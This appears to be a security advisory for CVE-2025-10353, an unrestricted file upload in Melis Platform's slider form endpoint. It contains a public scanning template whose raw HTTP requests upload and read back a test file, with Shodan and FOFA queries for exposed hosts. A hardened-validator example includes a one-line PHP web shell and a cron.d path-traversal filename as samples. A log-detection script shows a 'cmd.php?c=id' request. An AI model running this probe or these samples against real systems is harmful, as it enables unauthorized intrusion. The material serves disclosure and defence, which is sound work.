CVE-2025-10353: Melis Technology Melis Platform - Unrestricted File Upload & Remote Code Execution

Date: 2026-02-05 | Affected software: Melis Technology Melis Platform | PoC: public

Vulnerability Description

Melis Technology Melis Platform contains an unrestricted file upload (CWE-434) caused by insufficient validation of the 'mcsdetail_img' parameter in /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm. An attacker sends a crafted multipart POST request to that endpoint, the file is stored under /media/sliders/<slider id>/ with the client-supplied name, and a file the server executes from that location gives remote code execution. The PoC below uploads a harmless text file and reads it back, which confirms the unrestricted upload without executing anything on the target.
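The defect class described above, as an added illustration that is not Melis Platform code (the vendor's actual handler is not shown on this page): an upload validator that accepts any 'mcsdetail_img' filename, next to a hardened version that keeps only a basename, allowlists image extensions, checks the file's magic bytes against that extension, and picks a random storage name so the client never controls the path that ends up under the web root. The sample uploads, the function names and the extension/magic table are constructed for the example; Python is used for a runnable demonstration even though the product itself is assumed to be PHP-based.

```python
import os
import secrets
from typing import List, Optional, Tuple

# Constructed sample uploads (filename, leading bytes). Not real captures.
SAMPLE_UPLOADS: List[Tuple[str, bytes]] = [
    ("banner.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ("banner.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 8),
    ("shell.php", b"<?php system($_GET['c']); ?>"),
    ("shell.phtml", b"<?php echo 1; ?>"),
    ("fake.png", b"<?php echo 1; ?>"),                 # image name, script body
    ("../../../etc/cron.d/x", b"* * * * * root id"),  # traversal attempt
]

# Extension -> required leading bytes. Assumed table for the example.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def weak_validate(filename: str, data: bytes) -> bool:
    """The CWE-434 pattern the advisory describes: any non-empty name is
    accepted and stored as-is, so shell.php lands under the web root."""
    return bool(filename)


def hardened_validate(filename: str, data: bytes) -> Optional[str]:
    """Return a server-chosen storage name, or None to reject the upload.

    - basename only: strips any directory part, so '../' cannot escape
    - allowlisted extension: scripts (.php, .phtml, ...) are never stored
    - magic bytes must match the extension: a script renamed to .png fails
    - random name: the client never picks what /media/sliders/<id>/ serves
    """
    base = os.path.basename(filename.replace("\\", "/"))
    _, ext = os.path.splitext(base)
    ext = ext.lower()
    magic = ALLOWED.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    return secrets.token_hex(16) + ext


def compare(uploads: List[Tuple[str, bytes]]) -> List[Tuple[str, bool, bool]]:
    """(name, accepted_by_weak, accepted_by_hardened) for each sample."""
    return [
        (name, weak_validate(name, data), hardened_validate(name, data) is not None)
        for name, data in uploads
    ]


if __name__ == "__main__":
    for name, weak, hard in compare(SAMPLE_UPLOADS):
        print(f"{name:28} weak={weak!s:5} hardened={hard}")
```

The magic-byte check matters because an extension allowlist alone still lets a PHP file through when the server also interprets double extensions or when the stored name is later renamed; rejecting on content as well as name, and never reusing the client's name, closes both paths.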

PoC Code [public]

id: CVE-2025-10353

info:
  name: Melis Technology Melis Platform - Unrestricted File Upload & Remote Code Execution
  author: ohmygod20260203
  severity: critical
  description: |
    Melis Technology Melis Platform contains an unrestricted file upload caused by insufficient validation of the 'mcsdetail_img' parameter in /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm, letting attackers upload arbitrary files via a crafted multipart POST request and achieve remote code execution.
  impact: |
    Attackers can upload malicious files leading to remote code execution and full system compromise.
  remediation: |
    Update to the latest version with the vulnerability fixed.
  reference:
    - https://github.com/ivansmc00/CVE-2025-10353-POC
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-melis-platform
    - https://nvd.nist.gov/vuln/detail/CVE-2025-10353
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-10353
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/melis/MelisCms"
    fofa-query: body="/melis/MelisCms" || body="MelisDemoCms"
    product: melis-platform
    vendor: melis-technology
  tags: cve,cve2025,melis,cms,file-upload,rce,intrusive

variables:
  rand: "{{to_lower(rand_text_alpha(5))}}"
  filename: "{{rand}}.txt"
  payload: "CVE-2025-10353-{{rand}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----{{rand}}

        ------{{rand}}
        Content-Disposition: form-data; name="mcsdetail_mcslider_id"

        0
        ------{{rand}}
        Content-Disposition: form-data; name="mcsdetail_img"; filename="{{filename}}"
        Content-Type: text/plain

        {{payload}}
        ------{{rand}}--

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success") || contains(body, "uploaded")'
        condition: and

  - raw:
      - |
        GET /media/sliders/0/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, payload)'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - 'host + "/media/sliders/0/" + filename'
# digest: 4a0a0047304502201dbfa2abe16dfbcf7ecc1f627218b19c917d2d076a3560a0093198772b5c2d67022100e17de475daf3d09a6a8469318d69fbb0d959f5d8132cac2487282af3154ec50d:922c64590222798bb761d5b6d8e72950
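One way to spot this flow in web-server access logs, as an added example that is not part of the published template: the rule keys on a source that POSTs to the saveDetailsForm endpoint and, within a short window, fetches something other than an image from /media/sliders/. Note that the template above uploads a plain .txt and reads it back, so a 200 on the GET demonstrates the unrestricted upload, not code execution; whether a fetched .php under /media/ is actually interpreted depends on the web-server configuration, which this page does not state. The log lines are constructed in combined-log format, and the window, the extension sets and the assumption that the media path is logged verbatim are assumptions of the example.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple

UPLOAD_PATH = "/melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm"
MEDIA_RE = re.compile(r"^/media/sliders/(?P<slider>[^/]+)/(?P<name>[^/?]+)")
IMAGE_EXT = {"png", "jpg", "jpeg", "gif", "webp", "svg"}   # assumed allowlist
SCRIPT_EXT = {"php", "phtml", "phar", "php5", "php7"}      # assumed PHP handler set

# Apache/Nginx "combined" format; only the fields the rule needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: a probe like the template (.txt), a real script
# fetch (.php), and a legitimate editor uploading an image.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Feb/2026:10:00:01 +0000] "POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/1.1" 200 128 "-" "python-requests/2.31"
203.0.113.7 - - [05/Feb/2026:10:00:02 +0000] "GET /media/sliders/0/abcde.txt HTTP/1.1" 200 21 "-" "python-requests/2.31"
203.0.113.9 - - [05/Feb/2026:10:05:00 +0000] "POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/1.1" 200 128 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Feb/2026:10:05:03 +0000] "GET /media/sliders/0/cmd.php?c=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Feb/2026:10:06:00 +0000] "POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Feb/2026:10:06:01 +0000] "GET /media/sliders/3/hero.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Tuple[str, datetime, str, str, int]]:
    """(ip, timestamp, method, path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def detect(log_text: str, window_s: int = 300) -> List[Tuple[str, str, str]]:
    """Return (source_ip, fetched_name, kind) for every successful GET of a
    non-image file under /media/sliders/ that the same source preceded with a
    POST to the slider upload endpoint within `window_s` seconds.
    kind is 'script' for an extension a PHP handler would execute, otherwise
    'non-image' (the template's .txt probe shows up in this class)."""
    last_post: Dict[str, datetime] = {}
    hits: List[Tuple[str, str, str]] = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path.split("?", 1)[0] == UPLOAD_PATH:
            last_post[ip] = ts
            continue
        m = MEDIA_RE.match(path)
        if method != "GET" or m is None or status != 200:
            continue
        posted = last_post.get(ip)
        if posted is None or (ts - posted).total_seconds() > window_s:
            continue
        name = m["name"]
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in IMAGE_EXT:
            continue
        hits.append((ip, name, "script" if ext in SCRIPT_EXT else "non-image"))
    return hits


if __name__ == "__main__":
    for ip, name, kind in detect(SAMPLE_LOG):
        print(f"{kind:9} {ip:14} /media/sliders/.../{name}")
```

Keying on the fetched extension rather than on the POST alone keeps legitimate editor uploads quiet; for a stricter rule, alert on every POST to saveDetailsForm from a source with no authenticated session, since the advisory rates the endpoint as reachable without privileges (PR:N).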
